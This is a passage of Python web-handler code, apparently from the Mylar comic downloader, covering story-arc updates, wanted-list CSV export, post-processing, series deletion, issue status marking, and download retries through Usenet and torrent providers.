"Int_IssueNumber": int_issnum,
"Manual": manual_mod})
n+=1
comicid_results = mylar.cv.getComic(comicid=None, type='comicyears', comicidlist=cidlist)
logger.fdebug('%s Initiating issue updating - just the info' % module)
for AD in issuedata:
seriesYear = 'None'
issuePublisher = 'None'
seriesVolume = 'None'
if AD['IssueName'] is None:
IssueName = 'None'
else:
IssueName = AD['IssueName'][:70]
for cid in comicid_results:
if cid['ComicID'] == AD['ComicID']:
seriesYear = cid['SeriesYear']
issuePublisher = cid['Publisher']
seriesVolume = cid['Volume']
bookType = cid['Type']
seriesAliases = cid['Aliases']
if storyarcpublisher is None:
#assume that the arc is the same
storyarcpublisher = issuePublisher
break
newCtrl = {"IssueID": AD['IssueID'],
"StoryArcID": AD['StoryArcID']}
newVals = {"ComicID": AD['ComicID'],
"IssueArcID": AD['IssueArcID'],
"StoryArc": storyarcname,
"ComicName": AD['ComicName'],
"Volume": seriesVolume,
"DynamicComicName": AD['DynamicName'],
"IssueName": IssueName,
"IssueNumber": AD['Issue_Number'],
"Publisher": storyarcpublisher,
"TotalIssues": storyarcissues,
"ReadingOrder": AD['ReadingOrder'],
"IssueDate": AD['IssueDate'],
"ReleaseDate": AD['ReleaseDate'],
"DigitalDate": AD['DigitalDate'],
"SeriesYear": seriesYear,
"IssuePublisher": issuePublisher,
"CV_ArcID": arcid,
"Int_IssueNumber": AD['Int_IssueNumber'],
"Type": bookType,
"Aliases": seriesAliases,
"Manual": AD['Manual']}
myDB.upsert("storyarcs", newVals, newCtrl)
#run the Search for Watchlist matches now.
logger.fdebug(module + ' Now searching your watchlist for matches belonging to this story arc.')
self.ArcWatchlist(storyarcid)
if arcrefresh:
logger.info('%s Successfully Refreshed %s' % (module, storyarcname))
return
else:
logger.info('%s Successfully Added %s' % (module, storyarcname))
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarcname))
addStoryArc.exposed = True
def wanted_Export(self,mode):
import unicodedata
myDB = db.DBConnection()
wantlist = myDB.select("select b.ComicName, b.ComicYear, a.Issue_Number, a.IssueDate, a.ComicID, a.IssueID from issues a inner join comics b on a.ComicID=b.ComicID where a.status=? and b.ComicName is not NULL", [mode])
if wantlist is None:
logger.info("There aren't any issues marked as " + mode + ". Aborting Export.")
return
#write out a wanted_list.csv
logger.info("gathered data - writing to csv...")
wanted_file = os.path.join(mylar.DATA_DIR, str(mode) + "_list.csv")
if os.path.exists(wanted_file):
try:
os.remove(wanted_file)
except (OSError, IOError):
wanted_file_new = os.path.join(mylar.DATA_DIR, str(mode) + '_list-1.csv')
logger.warn('%s already exists. Writing to: %s' % (wanted_file, wanted_file_new))
wanted_file = wanted_file_new
wcount=0
with open(wanted_file, 'wb+') as f:
try:
fieldnames = ['SeriesName','SeriesYear','IssueNumber','IssueDate','ComicID','IssueID']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
for want in wantlist:
writer.writerow({'SeriesName': want['ComicName'],
'SeriesYear': want['ComicYear'],
'IssueNumber': want['Issue_Number'],
'IssueDate': want['IssueDate'],
'ComicID': want['ComicID'],
'IssueID': want['IssueID']})
wcount += 1
except IOError as Argument:
logger.info("Error writing value to {}. {}".format(wanted_file, Argument))
except Exception as Argument:
logger.info("Unknown error: {}".format(Argument))
if wcount > 0:
logger.info('Successfully wrote to csv file %s entries from your %s list.' % (wcount, mode))
else:
logger.info('Nothing written to csv file for your %s list.' % mode)
raise cherrypy.HTTPRedirect("home")
wanted_Export.exposed = True
def from_Exceptions(self, comicid, gcdid, comicname=None, comicyear=None, comicissues=None, comicpublisher=None, imported=None, ogcname=None):
import unicodedata
mismatch = "yes"
        #write it to the custom_exceptions.csv and reload it so that importer will pick it up and do its thing :)
#custom_exceptions in this format...
#99, (comicid), (gcdid), none
logger.info("saving new information into custom_exceptions.csv...")
except_info = "none #" + str(comicname) + "-(" + str(comicyear) + ")\n"
except_file = os.path.join(mylar.DATA_DIR, "custom_exceptions.csv")
if not os.path.exists(except_file):
try:
csvfile = open(str(except_file), 'rb')
csvfile.close()
except (OSError, IOError):
logger.error("Could not locate " + str(except_file) + " file. Make sure it's in datadir: " + mylar.DATA_DIR + " with proper permissions.")
return
exceptln = "99," + str(comicid) + "," + str(gcdid) + "," + str(except_info)
exceptline = exceptln.decode('utf-8', 'ignore')
with open(str(except_file), 'a') as f:
#f.write('%s,%s,%s,%s\n' % ("99", comicid, gcdid, except_info)
f.write('%s\n' % (exceptline.encode('ascii', 'replace').strip()))
logger.info("re-loading csv file so it's all nice and current.")
mylar.csv_load()
if imported:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
else:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
from_Exceptions.exposed = True
def GCDaddComic(self, comicid, comicname=None, comicyear=None, comicissues=None, comiccover=None, comicpublisher=None):
#since we already know most of the info, let's add it to the db so we can reference it later.
myDB = db.DBConnection()
gcomicid = "G" + str(comicid)
comicyear_len = comicyear.find(' ', 2)
comyear = comicyear[comicyear_len +1:comicyear_len +5]
if comyear.isdigit():
logger.fdebug("Series year set to : " + str(comyear))
else:
logger.fdebug("Invalid Series year detected - trying to adjust from " + str(comyear))
#comicyear_len above will trap wrong year if it's 10 October 2010 - etc ( 2000 AD)...
find_comicyear = comicyear.split()
for i in find_comicyear:
if len(i) == 4:
logger.fdebug("Series year detected as : " + str(i))
comyear = str(i)
continue
logger.fdebug("Series year set to: " + str(comyear))
controlValueDict = {'ComicID': gcomicid}
newValueDict = {'ComicName': comicname,
'ComicYear': comyear,
'ComicPublished': comicyear,
'ComicPublisher': comicpublisher,
'ComicImage': comiccover,
'Total': comicissues}
myDB.upsert("comics", newValueDict, controlValueDict)
threading.Thread(target=importer.GCDimport, args=[gcomicid]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % gcomicid)
GCDaddComic.exposed = True
def post_process(self, nzb_name, nzb_folder, failed=False, apc_version=None, comicrn_version=None):
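        #entry point for ComicRN / autoProcessComics.py and Manual Runs: verify the calling script versions, hand the
        #download folder off to the PostProcessor thread, then fall through to Failed Download handling if required.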
if all([nzb_name != 'Manual Run', nzb_name != 'Manual+Run']):
if comicrn_version is None and apc_version is None:
                logger.warn('ComicRN should be v' + str(mylar.STATIC_COMICRN_VERSION) + ' and autoProcessComics.py should be v' + str(mylar.STATIC_APC_VERSION) + ', but neither script reported a version - they are out of date. Post-Processing may or may not work.')
elif comicrn_version is None or comicrn_version != mylar.STATIC_COMICRN_VERSION:
if comicrn_version == 'None':
comicrn_version = "0"
logger.warn('Your ComicRN.py script should be v' + str(mylar.STATIC_COMICRN_VERSION) + ', but is v' + str(comicrn_version) + ' and is out of date. Things may still work - but you are taking your chances.')
elif apc_version is None or apc_version != mylar.STATIC_APC_VERSION:
if apc_version == 'None':
apc_version = "0"
if mylar.CONFIG.AUTHENTICATION == 2:
logger.warn('YOU NEED TO UPDATE YOUR autoProcessComics.py file in order to use this option with the Forms Login enabled due to security.')
logger.warn('Your autoProcessComics.py script should be v' + str(mylar.STATIC_APC_VERSION) + ', but is v' + str(apc_version) + ' and is out of date. Odds are something is gonna fail - you should update it.')
else:
logger.info('ComicRN.py version: ' + str(comicrn_version) + ' -- autoProcessComics.py version: ' + str(apc_version))
import Queue
logger.info('Starting postprocessing for : ' + nzb_name)
if failed == '0':
failed = False
elif failed == '1':
failed = True
queue = Queue.Queue()
retry_outside = False
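        #the queue is how the PostProcessor / FailedProcessor threads hand their status and log back to this generator.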
if not failed:
PostProcess = PostProcessor.PostProcessor(nzb_name, nzb_folder, queue=queue)
if nzb_name == 'Manual Run' or nzb_name == 'Manual+Run':
threading.Thread(target=PostProcess.Process).start()
#raise cherrypy.HTTPRedirect("home")
else:
thread_ = threading.Thread(target=PostProcess.Process, name="Post-Processing")
thread_.start()
thread_.join()
chk = queue.get()
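                #chk[0]['mode'] indicates how post-processing ended: 'fail' kicks off Failed Download handling,
                #'stop' means it completed (or bailed), and 'outside' triggers a Manual Run against the same folder.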
while True:
if chk[0]['mode'] == 'fail':
yield chk[0]['self.log']
logger.info('Initiating Failed Download handling')
if chk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
failed = True
break
elif chk[0]['mode'] == 'stop':
yield chk[0]['self.log']
break
elif chk[0]['mode'] == 'outside':
yield chk[0]['self.log']
retry_outside = True
break
else:
logger.error('mode is unsupported: ' + chk[0]['mode'])
yield chk[0]['self.log']
break
if failed:
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING is True:
#drop the if-else continuation so we can drop down to this from the above if statement.
logger.info('Initiating Failed Download handling for this download.')
FailProcess = Failed.FailedProcessor(nzb_name=nzb_name, nzb_folder=nzb_folder, queue=queue)
thread_ = threading.Thread(target=FailProcess.Process, name="FAILED Post-Processing")
thread_.start()
thread_.join()
failchk = queue.get()
if failchk[0]['mode'] == 'retry':
yield failchk[0]['self.log']
logger.info('Attempting to return to search module with ' + str(failchk[0]['issueid']))
if failchk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
self.queueit(mode=mode, ComicName=failchk[0]['comicname'], ComicIssue=failchk[0]['issuenumber'], ComicID=failchk[0]['comicid'], IssueID=failchk[0]['issueid'], manualsearch=True)
elif failchk[0]['mode'] == 'stop':
yield failchk[0]['self.log']
else:
logger.error('mode is unsupported: ' + failchk[0]['mode'])
yield failchk[0]['self.log']
else:
logger.warn('Failed Download Handling is not enabled. Leaving Failed Download as-is.')
if retry_outside:
PostProcess = PostProcessor.PostProcessor('Manual Run', nzb_folder, queue=queue)
thread_ = threading.Thread(target=PostProcess.Process, name="Post-Processing")
thread_.start()
thread_.join()
chk = queue.get()
while True:
if chk[0]['mode'] == 'fail':
yield chk[0]['self.log']
logger.info('Initiating Failed Download handling')
if chk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
failed = True
break
elif chk[0]['mode'] == 'stop':
yield chk[0]['self.log']
break
else:
logger.error('mode is unsupported: ' + chk[0]['mode'])
yield chk[0]['self.log']
break
return
post_process.exposed = True
def pauseSeries(self, ComicID):
logger.info(u"Pausing comic: " + ComicID)
myDB = db.DBConnection()
controlValueDict = {'ComicID': ComicID}
newValueDict = {'Status': 'Paused'}
myDB.upsert("comics", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
pauseSeries.exposed = True
def resumeSeries(self, ComicID):
logger.info(u"Resuming comic: " + ComicID)
myDB = db.DBConnection()
controlValueDict = {'ComicID': ComicID}
newValueDict = {'Status': 'Active'}
myDB.upsert("comics", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
resumeSeries.exposed = True
def deleteSeries(self, ComicID, delete_dir=None):
myDB = db.DBConnection()
comic = myDB.selectone('SELECT * from comics WHERE ComicID=?', [ComicID]).fetchone()
if comic['ComicName'] is None: ComicName = "None"
else: ComicName = comic['ComicName']
seriesdir = comic['ComicLocation']
seriesyear = comic['ComicYear']
seriesvol = comic['ComicVersion']
logger.info(u"Deleting all traces of Comic: " + ComicName)
myDB.action('DELETE from comics WHERE ComicID=?', [ComicID])
myDB.action('DELETE from issues WHERE ComicID=?', [ComicID])
if mylar.CONFIG.ANNUALS_ON:
myDB.action('DELETE from annuals WHERE ComicID=?', [ComicID])
myDB.action('DELETE from upcoming WHERE ComicID=?', [ComicID])
if delete_dir: #mylar.CONFIG.DELETE_REMOVE_DIR:
logger.fdebug('Remove directory on series removal enabled.')
if os.path.exists(seriesdir):
logger.fdebug('Attempting to remove the directory and contents of : ' + seriesdir)
try:
shutil.rmtree(seriesdir)
except:
logger.warn('Unable to remove directory after removing series from Mylar.')
else:
logger.info('Successfully removed directory: %s' % (seriesdir))
else:
logger.warn('Unable to remove directory as it does not exist in : ' + seriesdir)
myDB.action('DELETE from readlist WHERE ComicID=?', [ComicID])
logger.info('Successful deletion of %s %s (%s) from your watchlist' % (ComicName, seriesvol, seriesyear))
helpers.ComicSort(sequence='update')
raise cherrypy.HTTPRedirect("home")
deleteSeries.exposed = True
def wipenzblog(self, ComicID=None, IssueID=None):
myDB = db.DBConnection()
if ComicID is None:
logger.fdebug("Wiping NZBLOG in it's entirety. You should NOT be downloading while doing this or else you'll lose the log for the download.")
myDB.action('DROP table nzblog')
logger.fdebug("Deleted nzblog table.")
myDB.action('CREATE TABLE IF NOT EXISTS nzblog (IssueID TEXT, NZBName TEXT, SARC TEXT, PROVIDER TEXT, ID TEXT, AltNZBName TEXT, OneOff TEXT)')
logger.fdebug("Re-created nzblog table.")
raise cherrypy.HTTPRedirect("history")
if IssueID:
logger.fdebug('Removing all download history for the given IssueID. This should allow post-processing to finish for the given IssueID.')
myDB.action('DELETE FROM nzblog WHERE IssueID=?', [IssueID])
logger.fdebug('Successfully removed all entries in the download log for IssueID: ' + str(IssueID))
raise cherrypy.HTTPRedirect("history")
wipenzblog.exposed = True
def refreshSeries(self, ComicID):
comicsToAdd = [ComicID]
logger.fdebug("Refreshing comic: %s" % comicsToAdd)
#myDB = db.DBConnection()
#myDB.upsert('comics', {'Status': 'Loading'}, {'ComicID': ComicID})
#threading.Thread(target=updater.dbUpdate, args=[comicsToAdd,'refresh']).start()
updater.dbUpdate(comicsToAdd, 'refresh')
refreshSeries.exposed = True
def issue_edit(self, id, value):
logger.fdebug('id: ' + str(id))
logger.fdebug('value: ' + str(value))
comicid = id[:id.find('.')]
logger.fdebug('comicid:' + str(comicid))
issueid = id[id.find('.') +1:]
logger.fdebug('issueid:' + str(issueid))
myDB = db.DBConnection()
comicchk = myDB.selectone('SELECT ComicYear FROM comics WHERE ComicID=?', [comicid]).fetchone()
issuechk = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [issueid]).fetchone()
if issuechk is None:
logger.error('Cannot edit this for some reason - something is wrong.')
return
oldissuedate = issuechk['IssueDate']
seriesyear = comicchk['ComicYear']
issuenumber = issuechk['Issue_Number']
#check if the new date is in the correct format of yyyy-mm-dd
try:
valid_date = time.strptime(value, '%Y-%m-%d')
except ValueError:
logger.error('invalid date provided. Rejecting edit.')
return oldissuedate
#if the new issue year is less than the series year - reject it.
if value[:4] < seriesyear:
logger.error('Series year of ' + str(seriesyear) + ' is less than new issue date of ' + str(value[:4]))
return oldissuedate
newVal = {"IssueDate": value,
"IssueDate_Edit": oldissuedate}
ctrlVal = {"IssueID": issueid}
myDB.upsert("issues", newVal, ctrlVal)
logger.info('Updated Issue Date for issue #' + str(issuenumber))
return value
issue_edit.exposed=True
def force_rss(self):
logger.info('Attempting to run RSS Check Forcibly')
forcethis = mylar.rsscheckit.tehMain()
threading.Thread(target=forcethis.run, args=[True]).start()
force_rss.exposed = True
def markannuals(self, ann_action=None, **args):
self.markissues(ann_action, **args)
markannuals.exposed = True
def markissues(self, action=None, **args):
myDB = db.DBConnection()
issuesToAdd = []
issuestoArchive = []
if action == 'WantedNew':
newaction = 'Wanted'
else:
newaction = action
for IssueID in args:
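            #the issue tables post their own control fields along with the checkboxes, so skip anything that isn't an actual IssueID.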
if any([IssueID is None, 'issue_table' in IssueID, 'history_table' in IssueID, 'manage_issues' in IssueID, 'issue_table_length' in IssueID, 'issues' in IssueID, 'annuals' in IssueID, 'annual_table_length' in IssueID]):
continue
else:
mi = myDB.selectone("SELECT * FROM issues WHERE IssueID=?", [IssueID]).fetchone()
annchk = 'no'
if mi is None:
if mylar.CONFIG.ANNUALS_ON:
mi = myDB.selectone("SELECT * FROM annuals WHERE IssueID=?", [IssueID]).fetchone()
comicname = mi['ReleaseComicName']
annchk = 'yes'
else:
comicname = mi['ComicName']
miyr = myDB.selectone("SELECT ComicYear FROM comics WHERE ComicID=?", [mi['ComicID']]).fetchone()
if action == 'Downloaded':
if mi['Status'] == "Skipped" or mi['Status'] == "Wanted":
logger.fdebug(u"Cannot change status to %s as comic is not Snatched or Downloaded" % (newaction))
continue
elif action == 'Archived':
logger.fdebug(u"Marking %s %s as %s" % (comicname, mi['Issue_Number'], newaction))
#updater.forceRescan(mi['ComicID'])
issuestoArchive.append(IssueID)
elif action == 'Wanted' or action == 'Retry':
if mi['Status'] == 'Wanted':
logger.fdebug('Issue already set to Wanted status - no need to change it again.')
continue
if action == 'Retry': newaction = 'Wanted'
logger.fdebug(u"Marking %s %s as %s" % (comicname, mi['Issue_Number'], newaction))
issuesToAdd.append(IssueID)
elif action == 'Skipped':
logger.fdebug(u"Marking " + str(IssueID) + " as Skipped")
elif action == 'Clear':
myDB.action("DELETE FROM snatched WHERE IssueID=?", [IssueID])
elif action == 'Failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
logger.fdebug('Marking [' + comicname + '] : ' + str(IssueID) + ' as Failed. Sending to failed download handler.')
failedcomicid = mi['ComicID']
failedissueid = IssueID
break
controlValueDict = {"IssueID": IssueID}
newValueDict = {"Status": newaction}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
logger.fdebug("updated...to " + str(newaction))
if action == 'Failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
self.failed_handling(failedcomicid, failedissueid)
if len(issuestoArchive) > 0:
updater.forceRescan(mi['ComicID'])
if len(issuesToAdd) > 0:
logger.fdebug("Marking issues: %s as Wanted" % (issuesToAdd))
threading.Thread(target=search.searchIssueIDList, args=[issuesToAdd]).start()
#raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % mi['ComicID'])
markissues.exposed = True
def markentries(self, action=None, **args):
myDB = db.DBConnection()
cnt = 0
for ID in args:
logger.info(ID)
if any([ID is None, 'manage_failed_length' in ID]):
continue
else:
myDB.action("DELETE FROM Failed WHERE ID=?", [ID])
cnt+=1
logger.info('[DB FAILED CLEANSING] Cleared ' + str(cnt) + ' entries from the Failed DB so they will now be downloaded if available/working.')
markentries.exposed = True
def retryit(self, **kwargs):
threading.Thread(target=self.retryissue, kwargs=kwargs).start()
retryit.exposed = True
def retryissue(self, ComicName, ComicID, IssueID, IssueNumber, ReleaseComicID=None, ComicYear=None, redirect=None):
logger.info('ComicID:' + str(ComicID))
logger.info('Retrying : ' + str(IssueID))
# mode = either series or annual (want vs. want_ann)
#To retry the exact download again - we already have the nzb/torrent name stored in the nzblog.
#0 - Change status to Retrying.
#1 - we need to search the snatched table for the relevant information (since it HAS to be in snatched status)
#2 - we need to reference the ID from the snatched table to the nzblog table
# - if it doesn't match, then it's an invalid retry.
# - if it does match, we get the nzbname/torrent name and provider info
#3 - if it's an nzb - we recreate the sab/nzbget url and resubmit it directly.
# - if it's a torrent - we redownload the torrent and flip it to the watchdir on the local / seedbox.
#4 - Change status to Snatched.
myDB = db.DBConnection()
chk_snatch = myDB.select('SELECT * FROM snatched WHERE IssueID=?', [IssueID])
if chk_snatch is None:
logger.info('Unable to locate how issue was downloaded (name, provider). Cannot continue.')
return
providers_snatched = []
confirmedsnatch = False
for cs in chk_snatch:
if cs['Provider'] == 'CBT' or cs['Provider'] == 'KAT':
logger.info('Invalid provider attached to download (' + cs['Provider'] + '). I cannot find this on 32P, so ignoring this result.')
elif cs['Status'] == 'Snatched':
logger.info('Located snatched download:')
logger.info('--Referencing : ' + cs['Provider'] + ' @ ' + str(cs['DateAdded']))
providers_snatched.append({'Provider': cs['Provider'],
'DateAdded': cs['DateAdded']})
confirmedsnatch = True
elif (cs['Status'] == 'Post-Processed' or cs['Status'] == 'Downloaded') and confirmedsnatch == True:
logger.info('Issue has already been Snatched, Downloaded & Post-Processed.')
logger.info('You should be using Manual Search or Mark Wanted - not retry the same download.')
#return
if len(providers_snatched) == 0:
return
chk_logresults = []
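        #check the most recent snatch first - sort by DateAdded (then provider) descending before referencing the nzblog table.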
for ps in sorted(providers_snatched, key=itemgetter('DateAdded', 'Provider'), reverse=True):
try:
Provider_sql = '%' + ps['Provider'] + '%'
chk_the_log = myDB.selectone('SELECT * FROM nzblog WHERE IssueID=? AND Provider like (?)', [IssueID, Provider_sql]).fetchone()
except:
logger.warn('Unable to locate provider reference for attempted Retry. Will see if I can just get the last attempted download.')
chk_the_log = myDB.selectone('SELECT * FROM nzblog WHERE IssueID=? and Provider != "CBT" and Provider != "KAT"', [IssueID]).fetchone()
if chk_the_log is None:
if len(providers_snatched) == 1:
logger.info('Unable to locate provider information ' + ps['Provider'] + ' from nzblog - if you wiped the log, you have to search/download as per normal')
return
else:
logger.info('Unable to locate provider information ' + ps['Provider'] + ' from nzblog. Checking additional providers that came back as being used to download this issue')
continue
else:
chk_logresults.append({'NZBName': chk_the_log['NZBName'],
'ID': chk_the_log['ID'],
'PROVIDER': chk_the_log['PROVIDER']})
if all([ComicYear is not None, ComicYear != 'None']) and all([IssueID is not None, IssueID != 'None']):
getYear = myDB.selectone('SELECT IssueDate, ReleaseDate FROM Issues WHERE IssueID=?', [IssueID]).fetchone()
if getYear is None:
                logger.warn('Unable to retrieve valid Issue Date for Retry of Issue (try refreshing the series and then try again).')
return
if getYear['IssueDate'][:4] == '0000':
if getYear['ReleaseDate'][:4] == '0000':
                    logger.warn('Unable to retrieve valid Issue Date for Retry of Issue (try refreshing the series and then try again).')
return
else:
ComicYear = getYear['ReleaseDate'][:4]
else:
ComicYear = getYear['IssueDate'][:4]
for chk_log in chk_logresults:
nzbname = chk_log['NZBName']
id = chk_log['ID']
fullprov = chk_log['PROVIDER'] #the full newznab name if it exists will appear here as 'sitename (newznab)'
#now we break it down by provider to recreate the link.
#torrents first.
if any([fullprov == '32P', fullprov == 'WWT', fullprov == 'DEM']):
if not mylar.CONFIG.ENABLE_TORRENT_SEARCH:
logger.error('Torrent Providers are not enabled - unable to process retry request until provider is re-enabled.')
continue
if fullprov == '32P':
if not mylar.CONFIG.ENABLE_32P:
logger.error('32P is not enabled - unable to process retry request until provider is re-enabled.')
continue
elif any([fullprov == 'WWT', fullprov == 'DEM']):
if not mylar.CONFIG.ENABLE_PUBLIC:
logger.error('Public Torrents are not enabled - unable to process retry request until provider is re-enabled.')
continue
logger.fdebug("sending .torrent to watchdir.")
logger.fdebug("ComicName:" + ComicName)
logger.fdebug("Torrent Provider:" + fullprov)
logger.fdebug("Torrent ID:" + str(id))
rcheck = mylar.rsscheck.torsend2client(ComicName, IssueNumber, ComicYear, id, fullprov)
if rcheck == "fail":
logger.error("Unable to send torrent - check logs and settings.")
continue
else:
if any([mylar.USE_RTORRENT, mylar.USE_DELUGE]) and mylar.CONFIG.AUTO_SNATCH:
mylar.SNATCHED_QUEUE.put(rcheck['hash'])
elif mylar.CONFIG.ENABLE_SNATCH_SCRIPT:
#packs not supported on retry atm - Volume and Issuedate also not included due to limitations...
snatch_vars = {'comicinfo': {'comicname': ComicName,
'issuenumber': IssueNumber,
'seriesyear': ComicYear,
'comicid': ComicID,
'issueid': IssueID},
'pack': False,
'pack_numbers': None,
'pack_issuelist': None,
'provider': fullprov,
'method': 'torrent',
'clientmode': rcheck['clientmode'],
'torrentinfo': rcheck}
snatchitup = helpers.script_env('on-snatch',snatch_vars)
if snatchitup is True:
logger.info('Successfully submitted on-grab script as requested.')
else:
logger.info('Could not Successfully submit on-grab script as requested. Please check logs...')
logger.info('Successfully retried issue.')
break
else:
oneoff = False
chkthis = myDB.selectone('SELECT a.ComicID, a.ComicName, a.ComicVersion, a.ComicYear, b.IssueID, b.Issue_Number, b.IssueDate FROM comics as a INNER JOIN annuals as b ON a.ComicID = b.ComicID WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
chkthis = myDB.selectone('SELECT a.ComicID, a.ComicName, a.ComicVersion, a.ComicYear, b.IssueID, b.Issue_Number, b.IssueDate FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
chkthis = myDB.selectone('SELECT ComicID, ComicName, year as ComicYear, IssueID, IssueNumber as Issue_number, weeknumber, year from oneoffhistory WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
logger.warn('Unable to locate previous snatch details (checked issues/annuals/one-offs). Retrying the snatch for this issue is unavailable.')
continue
else:
logger.fdebug('Successfully located issue as a one-off download initiated via pull-list. Let\'s do this....')
oneoff = True
modcomicname = chkthis['ComicName']
else:
modcomicname = chkthis['ComicName'] + ' Annual'
if oneoff is True:
weekchk = helpers.weekly_info(chkthis['weeknumber'], chkthis['year'])
IssueDate = weekchk['midweek']
ComicVersion = None
else:
IssueDate = chkthis['IssueDate']
ComicVersion = chkthis['ComicVersion']
comicinfo = []
comicinfo.append({"ComicName": chkthis['ComicName'],
"ComicVolume": ComicVersion,
"IssueNumber": chkthis['Issue_Number'],
"comyear": chkthis['ComicYear'],
"IssueDate": IssueDate,
"pack": False,
"modcomicname": modcomicname,
"oneoff": oneoff})
newznabinfo = None
link = None
if fullprov == 'nzb.su':
if not mylar.CONFIG.NZBSU:
logger.error('nzb.su is not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://nzb.su/getnzb/ea1befdeee0affd663735b2b09010140.nzb&i=<uid>&r=<passkey>
link = 'http://nzb.su/getnzb/' + str(id) + '.nzb&i=' + str(mylar.CONFIG.NZBSU_UID) + '&r=' + str(mylar.CONFIG.NZBSU_APIKEY)
logger.info('fetched via nzb.su. Retrying the send : ' + str(link))
elif fullprov == 'dognzb':
if not mylar.CONFIG.DOGNZB:
logger.error('Dognzb is not enabled - unable to process retry request until provider is re-enabled.')
continue
# https://dognzb.cr/fetch/5931874bf7381b274f647712b796f0ac/<passkey>
link = 'https://dognzb.cr/fetch/' + str(id) + '/' + str(mylar.CONFIG.DOGNZB_APIKEY)
logger.info('fetched via dognzb. Retrying the send : ' + str(link))
elif fullprov == 'experimental':
if not mylar.CONFIG.EXPERIMENTAL:
logger.error('Experimental is not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://nzbindex.nl/download/110818178
link = 'http://nzbindex.nl/download/' + str(id)
logger.info('fetched via experimental. Retrying the send : ' + str(link))
elif 'newznab' in fullprov:
if not mylar.CONFIG.NEWZNAB:
logger.error('Newznabs are not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://192.168.2.2/getnzb/4323f9c567c260e3d9fc48e09462946c.nzb&i=<uid>&r=<passkey>
# trickier - we have to scroll through all the newznabs until we find a match.
                    logger.info('fetched via newznab. Retrying the send.')
m = re.findall('[^()]+', fullprov)
tmpprov = m[0].strip()
for newznab_info in mylar.CONFIG.EXTRA_NEWZNABS:
if tmpprov.lower() in newznab_info[0].lower():
if (newznab_info[5] == '1' or newznab_info[5] == 1):
if newznab_info[1].endswith('/'):
newznab_host = newznab_info[1]
else:
newznab_host = newznab_info[1] + '/'
newznab_api = newznab_info[3]
newznab_uid = newznab_info[4]
                                link = str(newznab_host) + 'api?apikey=' + str(newznab_api) + '&t=get&id=' + str(id)
logger.info('newznab detected as : ' + str(newznab_info[0]) + ' @ ' + str(newznab_host))
logger.info('link : ' + str(link))
newznabinfo = (newznab_info[0], newznab_info[1], newznab_info[2], newznab_info[3], newznab_info[4])
else:
logger.error(str(newznab_info[0]) + ' is not enabled - unable to process retry request until provider is re-enabled.')
break
if link is not None:
sendit = search.searcher(fullprov, nzbname, comicinfo, link=link, IssueID=IssueID, ComicID=ComicID, tmpprov=fullprov, directsend=True, newznab=newznabinfo)
break
return
retryissue.exposed = True
def queueit(self, **kwargs):
threading.Thread(target=self.queueissue, kwargs=kwargs).start()
queueit.exposed = True
def queueissue(self, mode, ComicName=None, ComicID=None, ComicYear=None, ComicIssue=None, IssueID=None, new=False, redirect=None, SeriesYear=None, SARC=None, IssueArcID=None, manualsearch=None, Publisher=None, pullinfo=None, pullweek=None, pullyear=None, manual=False, ComicVersion=None, BookType=None):
logger.fdebug('ComicID: %s' % ComicID)
logger.fdebug('mode: %s' % mode)
now = datetime.datetime.now()
myDB = db.DBConnection()
#mode dictates type of queue - either 'want' for individual comics, or 'series' for series watchlist.
if ComicID is None and mode == 'series':
issue = None
raise cherrypy.HTTPRedirect("searchit?name=%s&issue=%s&mode=%s" % (ComicName, 'None', 'series'))
elif ComicID is None and mode == 'pullseries':
# we can limit the search by including the issue # and searching for
# comics that have X many issues
raise cherrypy.HTTPRedirect("searchit?name=%s&issue=%s&mode=%s" % (ComicName, 'None', 'pullseries'))
elif ComicID is None and mode == 'readlist':
# this is for marking individual comics from a readlist to be downloaded.
# Because there is no associated ComicID or IssueID, follow same pattern as in 'pullwant'
# except we know the Year
if len(ComicYear) > 4:
ComicYear = ComicYear[:4]
if SARC is None:
# it's just a readlist queue (no storyarc mode enabled)
SARC = True
IssueArcID = None
else:
logger.info('Story Arc : %s queueing selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
#try to load the issue dates - can now sideload issue details.
dateload = myDB.selectone('SELECT * FROM storyarcs WHERE IssueArcID=?', [IssueArcID]).fetchone()
if dateload is None:
IssueDate = None
ReleaseDate = None
Publisher = None
SeriesYear = None
else:
IssueDate = dateload['IssueDate']
ReleaseDate = dateload['ReleaseDate']
Publisher = dateload['IssuePublisher']
SeriesYear = dateload['SeriesYear']
BookType = dateload['Type']
if ComicYear is None: ComicYear = SeriesYear
if dateload['Volume'] is None:
logger.info('Marking %s #%s as wanted...' % (ComicName, ComicIssue))
else:
logger.info('Marking %s (%s) #%s as wanted...' % (ComicName, dateload['Volume'], ComicIssue))
logger.fdebug('publisher: %s' % Publisher)
controlValueDict = {"IssueArcID": IssueArcID}
newStatus = {"Status": "Wanted"}
myDB.upsert("storyarcs", newStatus, controlValueDict)
moduletype = '[STORY-ARCS]'
passinfo = {'issueid': IssueArcID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
